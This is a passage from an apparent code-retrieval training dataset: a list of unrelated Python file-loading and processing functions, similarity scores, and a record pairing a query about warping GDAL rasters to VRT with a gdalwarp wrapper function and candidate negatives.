# distance is in m\n # point 2\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lon = ind_lon-1\n distmin = dist\n # point 3\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n distmin = dist\n # point 4\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n find_lon = ind_lon-1\n distmin = dist\n for per in pers:\n if per < Tmin or per > Tmax:\n continue\n try:\n pergrp = grp['%g_sec'%( per )]\n vel = pergrp['vel_iso_HD'].value\n vel_sem = pergrp['vel_sem_HD'].value\n except KeyError:\n if verbose:\n print 'No data for T = '+str(per)+' sec'\n continue\n T = np.append(T, per)\n disp_v = np.append(disp_v, vel[find_lat, find_lon])\n disp_un = np.append(disp_un, vel_sem[find_lat, find_lon])\n data = np.zeros((3, T.size))\n data[0, :] = T[:]\n data[1, :] = disp_v[:]\n data[2, :] = disp_un[:]\n disp_header = {'Np': T.size}\n self.add_auxiliary_data(data=data, data_type='RayDISPcurve', path=wtype+'/'+dtype+'/'+staid_aux, parameters=disp_header)\n indset.close()\n return", "def preprocess_sample(file, params):\n\n videoFile = file + \".mp4\"\n audioFile = file + \".wav\"\n roiFile = file + \".png\"\n visualFeaturesFile = file + \".npy\"\n\n roiSize = params[\"roiSize\"]\n normMean = params[\"normMean\"]\n normStd = params[\"normStd\"]\n vf = params[\"vf\"]\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n #Extract the audio from the video file using the FFmpeg utility and save it to a wav file.\n v2aCommand = \"ffmpeg -y -v quiet -i \" + videoFile + \" -ac 1 -ar 16000 -vn \" + audioFile\n os.system(v2aCommand)\n\n\n #for each frame, resize to 224x224 and crop the central 112x112 region\n captureObj = cv.VideoCapture(videoFile)\n roiSequence = list()\n while (captureObj.isOpened()):\n ret, frame = captureObj.read()\n if ret == True:\n grayed = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n grayed = grayed/255\n grayed = cv.resize(grayed, (224,224))\n roi = grayed[int(112-(roiSize/2)):int(112+(roiSize/2)), int(112-(roiSize/2)):int(112+(roiSize/2))]\n roiSequence.append(roi)\n else:\n break\n captureObj.release()\n cv.imwrite(roiFile, np.floor(255*np.concatenate(roiSequence, axis=1)).astype(np.int))\n\n\n #normalise the frames and extract features for each frame using the visual frontend\n #save the visual features to a .npy file\n inp = np.stack(roiSequence, axis=0)\n inp = np.expand_dims(inp, axis=[1,2])\n inp = (inp - normMean)/normStd\n inputBatch = torch.from_numpy(inp)\n inputBatch = (inputBatch.float()).to(device)\n vf.eval()\n with torch.no_grad():\n outputBatch = vf(inputBatch)\n out = torch.squeeze(outputBatch, dim=1)\n out = out.cpu().numpy()\n np.save(visualFeaturesFile, out)\n return", "def preprocess(self, name, input_file, observation):\n\n lba = LBAFile(input_file, self.sample_rate)\n\n if self.max_samples > 0:\n # User specified max number of samples\n max_samples = min(self.max_samples, lba.max_samples)\n else:\n max_samples = lba.max_samples\n\n # Length of the observation for the number of samples we're reading\n obs_length = lba.obs_length(max_samples)\n start = lba.obs_start\n end = start + datetime.timedelta(seconds=obs_length)\n\n LOG.info(\"LBA obs time: start {0} end {1} duration {2} sec\".format(start, end, obs_length))\n\n observation.observation_name = os.path.basename(name)\n observation.additional_metadata = json.dumps(lba.header)\n observation.antenna_name = self.antenna_name if self.antenna_name is not None else lba.header.get('ANTENNANAME', '')\n observation.sample_rate = self.sample_rate\n observation.length_seconds = obs_length\n observation.start_time = start.timestamp()\n observation.num_channels = lba.num_channels\n observation.num_samples = max_samples\n\n channel_map = None\n if self.obs_filename is not None:\n try:\n vex = pyvex.Vex(self.obs_filename)\n self._fill_source_array(observation, vex, start, end, max_samples)\n\n # Get channel info from the VEX file.\n # Pick the appropriate mode from the vex file. We run with the assumption for now that there's only one\n # mode, and get everything from it. If there are multiple modes, then error out\n if len(vex.modes) == 0:\n LOG.warning(\"No modes in vex file to get channel info from\")\n elif len(vex.modes) > 1:\n LOG.error(\"Cannot get channel information from vex file because multiple modes are present. This is currently unsupported\")\n else:\n # Get antenna info\n antenna = next((a for a in vex.antennas if a.def_name == self.antenna_name), None)\n if antenna is None:\n LOG.error(\"Specified antenna def name {0} is not present in the vex file\".format(self.antenna_name))\n else:\n LOG.info(\"Found antenna def name {0}. Name {1}\".format(self.antenna_name, antenna.name))\n mode = vex.modes[0]\n setup = mode.setups[antenna.name]\n channel_map = [[channel, mode.subbands[channel.subband_id], setup.ifs[\"IF_{0}\".format(channel.if_name)]] for channel in setup.channels]\n # TODO: I'm unsure if this is correct or what order we should use here\n # - Ordering by subband_id will match the CH0(0-8) ordering present in the vex file.\n # - Ordering by record_chan seems to make some logic sense as it orders them from low to\n # high frequency across pol R then pol L. It also orders the BBC values ascending.\n # - Neither of these seem to match the observation_details.md table.\n\n # TODO: For now, I'll assume sorting by record chan\n channel_map.sort(key=lambda c: c[0].record_chan)\n\n except Exception as e:\n LOG.error(\"Failed to parse vex file {0}\".format(e))\n\n samples_read = 0\n while samples_read < max_samples:\n remaining_samples = max_samples - samples_read\n samples_to_read = min(remaining_samples, self.chunk_size)\n samples = lba.read(samples_read, samples_to_read)\n\n for channel_index in range(samples.shape[1]):\n # Loop over each channel, then either output the channel directly\n # into the HDF5 file, or get the channel info to get the appropriate metadata\n # for the channel, then output that.\n\n channel_name = \"channel_{0}\".format(channel_index)\n\n out_channel = observation[channel_name]\n if out_channel is None:\n out_channel = observation.create_channel(channel_name, shape=(max_samples,), dtype=np.int8)\n if channel_map is not None:\n vex_channel, vex_subband, vex_if = channel_map[channel_index]\n # Add info from the vex file to the channel\n out_channel.freq_start = vex_channel.bbc_freq\n out_channel.freq_end = vex_channel.bbc_freq + vex_channel.bbc_bandwidth\n out_channel.additional_metadata = json.dumps({\n 'channel_name': vex_channel.name,\n 'polarisation': vex_subband.pol.decode('utf-8'),\n 'bbc_name': vex_channel.bbc_name,\n 'record_chan': vex_channel.record_chan,\n 'subband_id': vex_channel.subband_id,\n 'vlba_band_name': vex_if.vlba_band_name,\n 'if_sslo': vex_if.if_sslo,\n 'lower_edge_freq': vex_if.lower_edge_freq\n }, indent=4)\n data = samples[:, channel_index]\n out_channel.write_data(samples_read, data)\n\n samples_read += samples_to_read\n\n if (samples_read // self.chunk_size) % 10 == 0:\n LOG.info(\"{0:.2%} {1}/{2}\".format(samples_read / max_samples, samples_read, max_samples))\n\n LOG.info(\"LBA preprocessor complete\")", "def createOutput():\n\n firstPeriod = True\n # get edge No\n edgesNo = 0\n edgesSet = set()\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n edgesSet.add(tup[1])\n edgesNo = len(edgesSet)\n\n outputFile = open(path.FQoutput, 'w')\n outputFile.write('<?xml version=\"1.0\"?>\\n')\n outputFile.write('<paramEffects aggregationInterval=\"%d\" vehicles=\"%d\" edges=\"%d\">\\n' % (\n aggInterval, vehSum, edgesNo))\n for period, quota, vtypeDictR, taxiSum in generatePeriodQuotaSets(True):\n if quota is None:\n if not firstPeriod:\n outputFile.write(\"\\t</periods>\\n\")\n else:\n firstPeriod = False\n outputFile.write('\\t<periods period=\"%d\">\\n' % (period))\n else:\n simpleTaxiMeanVList = [0, 1]\n simpleEdgeMeanVList = [0, 1]\n drivenEdgesSet = set()\n\n if len(vtypeDictR) == 0: # if the processed FCD returns no Values\n print(\"noData p\", period, \" q\", quota)\n drivenEdgesSet.add(0)\n else: # create mean from all taxi speed values\n for timestep, taxiList in vtypeDictR.iteritems():\n for tup in taxiList: # all elements in this timestep\n simpleTaxiMeanVList[0] += tup[2]\n simpleTaxiMeanVList[1] += 1\n drivenEdgesSet.add(tup[1])\n # create mean from all edge speed values which are driven by the\n # chosen taxis\n drivenEdgesList = list(drivenEdgesSet)\n drivenEdgesList.sort()\n # print \"dataSets \",simpleTaxiMeanVList[1]\n\n # --edgeDump-- #\n \"\"\"\n for i in edgeDumpDict.keys(): #all intervals\n for edge,v in edgeDumpDict[i]:\n if BinarySearch.isElmInList(drivenEdgesList,edge):\n simpleEdgeMeanVList[0]+=v\n simpleEdgeMeanVList[1]+=1\n \"\"\"\n # --vtype-- #\n\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n if BinarySearch.isElmInList(drivenEdgesList, tup[1]):\n simpleEdgeMeanVList[0] += tup[2]\n simpleEdgeMeanVList[1] += 1\n\n # calc values for output\n detectedEdges = len(drivenEdgesSet)\n relDetectedEdges = detectedEdges * 100.0 / edgesNo\n vSim = simpleEdgeMeanVList[0] / simpleEdgeMeanVList[1]\n vSimFCD = simpleTaxiMeanVList[0] / simpleTaxiMeanVList[1]\n vAbsDiff = vSimFCD - vSim\n if vSim != 0:\n vRelDiff = vAbsDiff / vSim * 100\n else:\n vRelDiff = 100\n if vRelDiff < -40:\n vRelDiff = -35\n\n outputFile.write('\\t\\t<values taxiQuota=\"%f\" taxis=\"%d\" simMeanSpeed=\"%f\" simFcdMeanSpeed=\"%f\" ' % (\n quota, taxiSum, vSim, vSimFCD,))\n outputFile.write('detectedEdges=\"%d\" notDetectedEdges=\"%d\" ' % (\n detectedEdges, edgesNo - detectedEdges))\n outputFile.write('absSpeedDiff=\"%f\" relSpeedDiff=\"%f\" relDetectedEdges=\"%f\" relNotDetectedEdges=\"%f\"/>\\n' %\n (vAbsDiff, vRelDiff, relDetectedEdges, 100 - relDetectedEdges))\n outputFile.write(\"\\t</periods>\\n</paramEffects>\")\n outputFile.close()", "def build_spectrum(spectrum_filename):\n hdulist = fits.open(spectrum_filename)\n data = hdulist[1].data\n \n spec = Spectrum(data['wave'], data['flux'], data['error'])\n \n return spec", "def t8_loadFile(self):\n print \"spectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = self.filenameparser(filename)\n self.t8_filename = filename", "def register(\n sample_file,\n select,\n src=dstain.config.DATA_RAW,\n output=dstain.config.REGISTRATION,\n window=512,\n downsample=1,\n patches=0,\n zip_patches=False,\n verbose=True,\n thumbnail_downsample=128,\n nfeatures=5000,\n ransacreprojthreshold=25,\n affine=True):\n\n # Reading list of files in each sample\n # samples[key] = value\n # key is the name of the sample\n # value is a list of filenames\n samples = dstain.utils.read_sample_file(sample_file, use_split=False)\n\n # Allow subselection of samples to register\n if select == ():\n select = sorted(samples.keys())\n\n # Loop through samples\n for (i, sample) in enumerate(select):\n print(\"Sample #{} / {}: {}\".format(i + 1, len(select), sample), flush=True)\n dstain.utils.register.register_sample(\n src, os.path.join(output, sample), samples[sample], window, downsample,\n patches, zip_patches, verbose, thumbnail_downsample, nfeatures, ransacreprojthreshold, affine)", "def test_process_5_1_surround_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/surround.wav'\n self.default_kwargs['input_file'] = test_path\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def fromFile(self,fn = None):\n\n while True:\n\n if fn == None:\n fn = getFilename(\"Spectrometer file\",\"spec\")\n else:\n fn = getExpandedFilename(fn) # Sort out logicals\n if not fn.endswith(\"spec\"): # Append \".spec\" if not given\n fn += \".spec\"\n\n try:\n sfile= open(fn,\"r\") # open file\n lines = sfile.readlines()\n sfile.close()\n break\n except FileNotFoundError:\n getLogger().error(\"Failed to find spectrometer file : \" + str(fn))\n fn = None\n\n\n # read file and process one line at a time\n #\n\n # Read through line at a time\n for line in lines:\n\n line = line.strip()\n if not line.startswith(\"#\") and len(line) > 0: # Kill comments and blanks\n token = line.split()\n\n if token[0].startswith(\"point\"):\n v = eval(token[1])\n self.setPoint(v)\n\n elif token[0].startswith(\"index\"):\n self.setIndex(token[1])\n\n elif token[0].startswith(\"angle\"):\n self.angle = math.radians(float(token[1]))\n self.setTilt(self.tilt) # Reset surfaces\n\n elif token[0].startswith(\"height\"):\n self.height = float(token[1])\n\n elif token[0].startswith(\"beam\"):\n self.beam = float(token[1])\n\n elif token[0].startswith(\"tilt\"):\n self.setTilt(math.radians(token[1]))\n\n elif token[0].startswith(\"setup\"):\n self.setUpWavelength(float(token[1]))\n\n else:\n raise ValueError(\"Sprectometer: illegal key : {0:s}\".format(token[0]))\n\n return self", "def mono(filename,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n if ch==2:\n print('Converting to mono...')\n L=data[:,0]\n R=data[:,1]\n n=len(data)\n data_m=np.zeros((n,1))\n data_m=L/2.0+R/2.0\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_mono.wav',data_m,sr,'PCM_16')\n print('Done!')\n return data_m\n else:\n print( \"Error: input is already mono stoooooooooopid!\")", "def load(filename):\n root,ext = _os_path.splitext(filename)\n loader = LOADER[ext]\n frequency,raw_signal = loader(filename)\n iinfo = _numpy.iinfo(raw_signal.dtype)\n raw_signal_midpoint = (iinfo.max + iinfo.min)/2.\n raw_signal_range = iinfo.max - raw_signal_midpoint\n unit_output_signal = (raw_signal - raw_signal_midpoint)/raw_signal_range\n return (frequency, unit_output_signal)", "def __convert_single_only_au_AutoVC_format_to_dataset__(self, filename, build_train_dataset=True):\n\n global_clip_index, video_name = filename\n\n # audio_file = os.path.join(self.src_dir, 'raw_wav', '{}.wav'.\n # format(video_name[:-4]))\n audio_file = os.path.join(self.src_dir, 'raw_wav', '{:05d}_{}_audio.wav'.\n format(global_clip_index, video_name[:-4]))\n if(not build_train_dataset):\n import shutil\n audio_file = os.path.join(self.src_dir, 'raw_wav', '{:05d}_{}_audio.wav'.\n format(global_clip_index, video_name[:-4]))\n shutil.copy(os.path.join(self.src_dir, 'test_wav_files', video_name), audio_file)\n\n sound = AudioSegment.from_file(audio_file, \"wav\")\n normalized_sound = match_target_amplitude(sound, -20.0)\n normalized_sound.export(audio_file, format='wav')\n\n from third_party.autovc.retrain_version.vocoder_spec.extract_f0_func import extract_f0_func_audiofile\n S, f0_norm = extract_f0_func_audiofile(audio_file, 'M')\n\n from third_party.autovc.utils import quantize_f0_interp\n f0_onehot = quantize_f0_interp(f0_norm)\n\n from third_party.resemblyer_util.speaker_emb import get_spk_emb\n mean_emb, _ = get_spk_emb(audio_file)\n\n return S, mean_emb, f0_onehot", "def fix_file(file_path: str, output_path_fixed: str, target_rate: int=16000,\n channels: int=1, output_path: str=None, min_duration: int=None,\n verbose_level: int=0):\n file_name = file_path.split(os.sep)[-1]\n new_file_path = output_path_fixed + os.sep + file_name\n\n try:\n # Get the audio length\n out = syscommand.system('soxi -D ' + file_path)\n duration = float(out)\n # Get the number of channels\n out = syscommand.system('soxi -c ' + file_path)\n current_n_channels = int(out)\n # Get the current rate\n out = syscommand.system('soxi -r ' + file_path)\n current_rate = int(out)\n if min_duration is not None and duration < min_duration:\n raise Exception(\"Minimum length not satisfied\")\n except Exception as err:\n if str(verbose_level) != '0':\n print(err)\n return None, file_path\n\n if current_rate != target_rate and current_n_channels != channels:\n speed = float(current_rate) / float(target_rate)\n cmd = 'sox -V{} -r 16k {} {} channels 1 ' \\\n 'speed {}'.format(verbose_level, file_path, new_file_path,\n speed)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n elif current_rate != target_rate:\n speed = float(current_rate) / float(target_rate)\n cmd = 'sox -V{} -r 16k {} {} ' \\\n 'speed {}'.format(verbose_level, file_path, new_file_path,\n speed)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n elif current_n_channels != channels:\n cmd = 'sox -V{} {} {} channels 1'.format(verbose_level, file_path,\n new_file_path)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n\n # Copy file if output path were provided and the file is not there\n if output_path is not None:\n copyfile(file_path, new_file_path)\n return file_path, file_path", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def read_ultrasound_file(ult_file):\n\n return np.fromfile(open(ult_file, \"rb\"), dtype=np.uint8)", "def generate_rsat_bg_file(input_file_path, output_file_path, strand_type):\n cmd = [\"sh\", \"generate_rsat_bg_file.sh\",\n \"-i\", input_file_path,\n \"-o\", output_file_path,\n \"-s\", strand_type]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n process.wait()", "def single_file(filename, exposure_times, osc_start, osc_width, epoch):\n index = scan_helper_image_files.image_to_index(os.path.split(filename)[-1])\n if epoch is None:\n epoch = 0.0\n\n # if the oscillation width is negative at this stage it is almost\n # certainly an artefact of the omega end being 0 when the omega start\n # angle was ~ 360 so it would be ~ -360 - see dxtbx#378\n if osc_width < -180:\n osc_width += 360\n\n return ScanFactory.make_scan(\n (index, index), exposure_times, (osc_start, osc_width), {index: epoch}\n )", "def t4_loadFile(self):\n print \"subspectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = \"SubSpectrumData/\" + self.filenameparser(filename)\n self.t4_filename = filename", "def __init__(self, in_file: str, out_file: str, sample_rate: float,\n max_time_gap: timedelta):\n\n self.in_file = in_file\n self.out_file = out_file\n\n # Set up the input/output file objects:\n self.in_data = MobileData(in_file, 'r')\n self.out_data = MobileData(out_file, 'w')\n\n # Hold information about the different fields to use:\n # All fields in the input file:\n self.all_fields = None # type: Optional[Dict[str, str]]\n\n # Stamp field name:\n self.stamp_field = default_stamp_field\n\n # Only sensor fields:\n self.sensor_fields = None # type: Optional[Dict[str, str]]\n\n # List of label fields:\n self.label_fields = default_label_fields\n\n # Determine the output sample interval in seconds:\n self.sample_interval = timedelta(seconds=1.0 / sample_rate)\n\n # Maximum gap between input events - longer than this and we will restart resampling:\n self.max_time_gap = max_time_gap\n\n # The previous and next output stamps to use:\n self.prev_out_stamp = None # type: Optional[datetime]\n self.next_out_stamp = None # type: Optional[datetime]\n\n # The next event from the input file:\n self.next_input_event = None # type: Optional[Dict[str, Union[float, str, datetime, None]]]\n\n # The last-seen input event:\n self.last_seen_input_event = None # type: Optional[Dict[str, Union[float, str, datetime, None]]]\n\n # Information about input events seen in a sample interval:\n self.num_events_in_interval = 0\n self.interval_sensor_values = None # type: Optional[Dict[str, List[float, str]]]\n self.interval_labels = None # type: Optional[Dict[str, List[str]]]\n\n # Status update info:\n self.status_num_events_interval = status_num_events_interval\n self.num_input_events_processed = 0\n self.num_events_since_last_status = 0\n self.first_event_stamp = None # type: Optional[datetime]", "def rdmb_povray(file_base,\n time_point=2000,\n width=800, height=600,\n angle=14):\n\n file_prms = file_base + \"_prms.npz\"\n vs, *_ = load_rd_prms(file_prms)\n file_uv = file_base + \"_{:05}.npz\".format(time_point)\n\n file_png = file_base + \"_{:05}.png\".format(time_point)\n ucs, vcs = load_rd_uv(file_uv)\n\n rdmb_povray_save(file_png,\n vs,\n ucs, vcs,\n width=width, height=height,\n rotx=0, roty=0, rotz=0,\n angle=angle)\n\n return file_png", "def t1_loadFile(self):\n print \"subspectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = self.filenameparser(filename)\n self.t1_filename = filename", "def convert_file(self, file_path: str) -> None:\n print(\n f\"Converting {os.path.split(file_path)[1]} to {self.output_format}\")\n\n output = AudioSegment.from_file(file_path, format=self.output_format)\n output.export(file_path.replace(self.input_format,\n f'{self.output_format}'), format=self.output_format)", "def test_input_flux_file():\n # Generate an input file\n flux_input_file = tstutils.data_path('test.flux')\n if os.path.isfile(flux_input_file):\n os.remove(flux_input_file)\n\n cfg_lines = ['[fluxcalib]']\n cfg_lines += [' extinct_correct = False # Set to True if your SENSFUNC derived with the UVIS algorithm\\n']\n cfg_lines += ['# Please add your SENSFUNC file name below before running pypeit_flux_calib']\n\n # These files need to be in tests/files/\n data = Table()\n data['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data['sensfile'] = 'sens_cN20170331S0206-HIP62745_GNIRS_20170331T083351.681.fits'\n # \n paths = [tstutils.data_path('')]\n\n fluxFile = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data)\n # Write\n fluxFile.write(flux_input_file)\n\n # Read\n fluxFile2 = inputfiles.FluxFile.from_file(flux_input_file)\n assert np.all(fluxFile2.data['filename'] == data['filename'])\n\n # Test path\n assert fluxFile2.file_paths[0] == paths[0]\n assert fluxFile2.filenames[0] == os.path.join(paths[0], data['filename'][0])\n\n # #################\n # Tickle the other ways to do sensfiles\n data3 = Table()\n data3['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data3['sensfile'] = ['sens_cN20170331S0206-HIP62745_GNIRS_20170331T083351.681.fits',\n '']\n\n fluxFile3 = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data3)\n assert fluxFile3.sensfiles[1] == os.path.join(paths[0], data['sensfile'][0])\n \n data4 = Table()\n data4['filename'] = ['spec1d_cN20170331S0216-pisco_GNIRS_20170331T085412.181.fits',\n 'spec1d_cN20170331S0217-pisco_GNIRS_20170331T085933.097.fits']\n data4['sensfile'] = ''\n\n fluxFile4 = inputfiles.FluxFile(config=cfg_lines, \n file_paths=paths,\n data_table=data4)\n assert len(fluxFile4.sensfiles) == 0\n\n # Clean up\n os.remove(flux_input_file)", "def from_file(cls, infilename):\n\n spect_file_obj = _get_file_object(infilename)\n\n kwargs = {'counts': spect_file_obj.data,\n 'input_file_object': spect_file_obj,\n 'bin_edges_kev': spect_file_obj.bin_edges_kev}\n\n # TODO Get more attributes from self.infileobj\n\n return cls(**kwargs)", "def readNextGenSpectrum(fname=''):\n\n print('Reading : ', fname)\n\n with open(fname, 'r') as rfile:\n dum = rfile.readline()\n sdum = dum.split()\n teff = float(sdum[0])\n logg = float(sdum[1])\n mph = float(sdum[2])\n dum = rfile.readline()\n nwav = float(dum.split()[0])\n\n bigline = []\n dum = rfile.readline()\n while dum.strip() != '':\n sdum = dum.split()\n for i in range(len(sdum)):\n bigline.append(float(sdum[i]))\n dum = rfile.readline()\n\n bigline = np.array(bigline)\n # Convert wavelength from angstrom to micron\n wav = bigline[:nwav] / 1e4\n inu = bigline[nwav:2 * nwav]\n bnu = bigline[nwav * 2:nwav * 3]\n\n ii = wav.argsort()\n wav = wav[ii]\n inu = inu[ii] * 1e-8 * wav * 1e4 / np.pi / (29979245800.0 / wav * 1e4)\n bnu = bnu[ii] * 1e-8 * wav * 1e4 / np.pi / (29979245800.0 / wav * 1e4)\n\n #\n # The unit is now erg/s/cm/Hz/ster\n #\n\n return {'teff': teff, 'logg': logg, 'mph': mph, 'nwav': nwav, 'wav': wav, 'inu': inu, 'bnu': bnu}" ]
[ "0.5761271", "0.539191", "0.53234494", "0.5275649", "0.52752906", "0.527388", "0.5264173", "0.5234479", "0.52175415", "0.52002573", "0.51625293", "0.50720745", "0.50369114", "0.50217336", "0.4970289", "0.4957576", "0.4887836", "0.48874044", "0.48784587", "0.48682615", "0.48431507", "0.4821813", "0.4798794", "0.47955054", "0.47944763", "0.47788334", "0.4760828", "0.47491097", "0.47395235", "0.473859", "0.4728464", "0.47205108", "0.4718296", "0.4699509", "0.46907875", "0.46900317", "0.46839598", "0.46676472", "0.46654132", "0.4662987", "0.4661223", "0.46526825", "0.46471262", "0.46460265", "0.46451494", "0.46400797", "0.46325704", "0.46313334", "0.462308", "0.46189407", "0.46108603", "0.46087196", "0.46037698", "0.4601273", "0.4597162", "0.4594524", "0.45913455", "0.45891723", "0.4584942", "0.45793033", "0.45779246", "0.45749986", "0.45504475", "0.45463043", "0.4543516", "0.45414495", "0.452874", "0.45271194", "0.45237294", "0.45118976", "0.4500996", "0.450067", "0.44967198", "0.4493465", "0.44839185", "0.4480523", "0.4479649", "0.44785467", "0.44770253", "0.44769156", "0.44735265", "0.447134", "0.44712424", "0.44710973", "0.4469421", "0.44648623", "0.44594908", "0.44590545", "0.44494408", "0.4441082", "0.44405836", "0.4437614", "0.44366112", "0.4431811", "0.4430243", "0.44246772", "0.44173437", "0.44167867", "0.4416742", "0.44151467" ]
0.546153
1
Takes an GDALreadable inputfile and generates the VRT to warp it.
def warp(inputfile, spatial_ref=None, cmd=GDALWARP, resampling=None, maximum_resolution=None): dataset = Dataset(inputfile) warp_cmd = [ cmd, '-q', # Quiet - FIXME: Use logging '-of', 'VRT', # Output to VRT ] # Warping to Mercator. if spatial_ref is None: spatial_ref = SpatialReference.FromEPSG(EPSG_WEB_MERCATOR) warp_cmd.extend(['-t_srs', spatial_ref.GetEPSGString()]) # Resampling method if resampling is not None: if not isinstance(resampling, basestring): try: resampling = RESAMPLING_METHODS[resampling] except KeyError: raise UnknownResamplingMethodError(resampling) elif resampling not in list(RESAMPLING_METHODS.values()): raise UnknownResamplingMethodError(resampling) warp_cmd.extend(['-r', resampling]) # Propagate No Data Value nodata_values = [dataset.GetRasterBand(i).GetNoDataValue() for i in range(1, dataset.RasterCount + 1)] if any(nodata_values): nodata_values = [str(v).lower() for v in nodata_values] warp_cmd.extend(['-dstnodata', ' '.join(nodata_values)]) # Call gdalwarp warp_cmd.extend([inputfile, '/vsistdout']) try: return VRT(check_output_gdal([str(e) for e in warp_cmd])) except CalledGdalError as e: if e.error == ("ERROR 6: Read or update mode not supported on /vsistdout"): return VRT(e.output) raise
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def run_vorpaline(self, input_file, *options):\n\n self._input_file = input_file\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpalite\", args)", "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def copy_vrt(in_fname, out_fname=None, bbox=None, verbose=True):\n from gdal import Translate\n\n if out_fname is None:\n out_fname = in_fname + \".vrt\"\n\n # Using Translate... but would use Warp if every reprojecting\n if bbox:\n left, bottom, right, top = bbox\n projwin = (left, top, right, bottom) # unclear why Translate does UL LR\n else:\n projwin = None\n if verbose:\n logger.info(f\"Creating {out_fname}, subset bbox: {bbox}\")\n Translate(out_fname, in_fname, projWin=projwin)", "def buildvrt(indir, outdir):\n indir = Path(indir)\n outdir = 